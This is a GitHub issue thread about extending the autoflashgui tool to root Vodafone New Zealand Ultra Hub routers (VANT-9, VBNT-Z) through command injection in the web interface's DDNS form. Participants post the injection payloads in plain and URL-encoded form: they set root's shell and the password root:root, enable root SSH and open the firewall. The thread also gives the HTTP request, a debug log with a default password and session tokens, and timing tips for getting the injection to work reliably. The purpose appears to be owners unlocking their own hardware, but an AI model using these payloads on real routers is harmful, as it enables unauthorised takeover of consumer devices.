mswhirl/autoflashgui

[ENHANCEMENT] Add support for VANT-9 and VBNT-Z (Vodafone Ultra Hub & Ultra Hub Plus) from New Zealand

Opened this issue · 4 comments

Discussion & commands here: hack-technicolor/hack-technicolor#68

@mswhirl - let us know if this would be reasonably easy, or quite a bit of work?

If it helps, I can send you a wireshark trace of the login process, firmware flash form post/response, and DDNS form post/responses? And some screenshots

Line: variant=DGA0130VDF Vodafone 17.1.7988 (root) Advanced DDNS,AdvancedDDNS,www.DynDNS.org,sleep 30;
mainscript host: 192.168.1.1
mainscript username: b'vodafone'
mainscript password: b'fxXfjhUwENKn'
mainscript flashFirmware: 0
mainscript upgradeFilename:
mainscript flashSleepDelay: 120
mainscript activeMethod: AdvancedDDNS
mainscript activeCommand: sleep 30;
mainscript splitCommand: 1
mainscript ddnsService: www.DynDNS.org
mainscript connectRetryDelay: 5
mainscript interCommandDelay: 5
Connect attempt 1
<Response [200]>
Modem up
Authenticating
Authentication failed, debug values are: ['Got CSRF token: 1e636dfeed589dcd4a6253d6b73bafa7040eb59a19007dc43d3d26fe99470819', "A value b'877b7d4b6bba5eeebc07da61ce4cca5f6690056fade94e8cb14d7208c4291d5dc8f2fb2edecf285042f84db5021f5cf15835d97b0ea4f53ca9c5f5327f748f4a4629d33e3af806db6dc71f99763e4713e2fa2b69dd5514a3304846a17dceb4b5e43bd2860bebde6aa030fc04fa3596e9a9036b259119f189dec0e8f3ce6e6b3acc414b866ae62ab32834b2908a55de1eb4dbead33a361d0b4788a5b8992be9dcf6ff882b622384c2987f22dfa573e892beb090ce7300215780996f58a420203418b038fe2453fb3edfdb89cc3ea5a958c98f2f59fa0a681769ec94309afde7e568bc9a1417c390c2b8ac2b35e0ec0b063707c94d02e289e9e8a4053589b3c6f2'", 'br.response <Response [200]>', "Challenge received: {'error': {'msg': 'failed', 'waitTime': '7', 'wrongCount': '6'}}"]
Exception: <class 'KeyError'>
Exception in Tkinter callback
Traceback (most recent call last):
File "/home/henry/Documents/vodafone hack/exploit/theirs/autoflashgui/libautoflashgui.py", line 37, in srp6authenticate
M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'

this is where I'm at currently

Tested On firmware: RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi / 17.1.7988-2461009-CRF846-V2.4.6
the commands needed to root bring up dropbear and allow ssh through the firewall
user/pass: root:root with a loopback char of Y you could also just look for the success json in the response.

sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y
echo "root:root" | chpasswd;echo Y
uci set dropbear.wan.enable='0';echo Y
uci set dropbear.lan.enable='1';echo Y
uci set dropbear.lan.PasswordAuth=on;echo Y
uci set dropbear.lan.RootPasswordAuth=on;echo Y
uci set dropbear.lan.RootLogin=1;echo Y
uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';echo Y
uci commit;echo Y
echo > /etc/dropbear/authorized_keys;echo Y
/etc/init.d/firewall restart;echo Y
/etc/init.d/dropbear restart;echo Y
sed -i 's/#//' /etc/inittab

or formatted for injection

%3Bsed+-i+'s#root:%2Fbin%2Ffalse#root:%2Fbin%2Fash#'+%2Fetc%2Fpasswd%3Becho+Y
%3Becho+"root:root"+|+chpasswd%3Becho+Y
%3Buci+set+dropbear.wan.enable='0'%3Becho+Y
%3Buci+set+dropbear.lan.enable='1'%3Becho+Y
%3Buci+set+dropbear.lan.PasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootPasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootLogin=1%3Becho+Y
%3Buci+set+firewall.Allow_SSH_Vodafone_lan.target='ACCEPT'%3Becho+Y
%3Buci+commit%3Becho+Y
%3Becho+>+%2Fetc%2Fdropbear%2Fauthorized_keys%3Becho+Y
%3B%2Fetc%2Finit.d%2Ffirewall+restart%3Becho+Y
%3B%2Fetc%2Finit.d%2Fdropbear+restart%3Becho+Y
%3Bsed+-i+'s%2F#%2F%2F'+%2Fetc%2Finittab
I have confirmed these commands can be executed manually and work through the webui on firmware

DDNS Request:
POST http://192.168.1.1/modals/dns-ddns.lp HTTP/1.1
Connection: keep-alive
Content-Length: 232
Accept: /
Origin: https://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.1/
Accept-Language: en-gb
Cookie: webui_language=en-us; sessionID=d937126e96d3b948ceaff4398b9c329aa00d87342eb9d3b38e832b92df24b719
Host: 192.168.1.1

ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE&CSRFtoken=a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2

DDNS RESPONSE:

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 Sep 2019 12:43:50 GMT
Content-Type: application/json
Connection: keep-alive
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';
cache-control: no-cache
Content-Language: en-us
X-Frame-Options: SAMEORIGIN

{ "status":"success" }

There is a working fork for VANT-9 here now: https://github.com/jameskeenan295/autoflashgui
but the commands need to be run multiple times to take effect before the ssh shell starts working. So its still a work in progress.

Did some more testing today and noticed a few interesting points about the rooting process through ddns command injection.

  1. on VANT-9 and VBNT-Z the commands have a large delay from when the POST is sent before they execute. I observed the delay by posting lots of curl commands and then measured the delta from timestamps from the POST and the web server logs.
  2. VANT-9 & VBNT-Z both execute the commands twice, for each post to the ddns form. The first executes at +11sec, and second around +23sec.
  3. The command length (POST'ed to the ddns form) can exceed 1024 characters (I tested various lengths using curl commands
  4. Easiest method is to submit all the commands in one go, with semicolons between them, and then have patience to wait at least 30sec before testing it.
  5. VBNT-Z uses different ddns and firmware upgrade URL's to VANT-9

Rooting process is working reliably now for both router models, using default ssh port 22.

To keep things simple for merging the fork back into mswhirls code later I've removed the http server component of the AFG fork, and updated defaults.ini with two new entries:
DNA0130 Vodafone NZ 17.4.0182-0841014
DGA0130 Vodafone NZ 17.1.7988-2461009-CRF846-V2.4.6

Recommendations are:
Untick the "split the given command on semicolons..." option in the AFG GUI (or set defaultSplitCommand=0 in defaults.ini)

Or: you must use: defaultInterCommandDelay=30

Some other minor changes to libautoflashgui.py:
Added timestamps to all the print commands.
Added additional URL's for firmware flashing VANT-9 & VBNT-Z. The flashing process doesn't work yet through AFG. I just get: 500 Internal Server Error

https://github.com/jameskeenan295/autoflashgui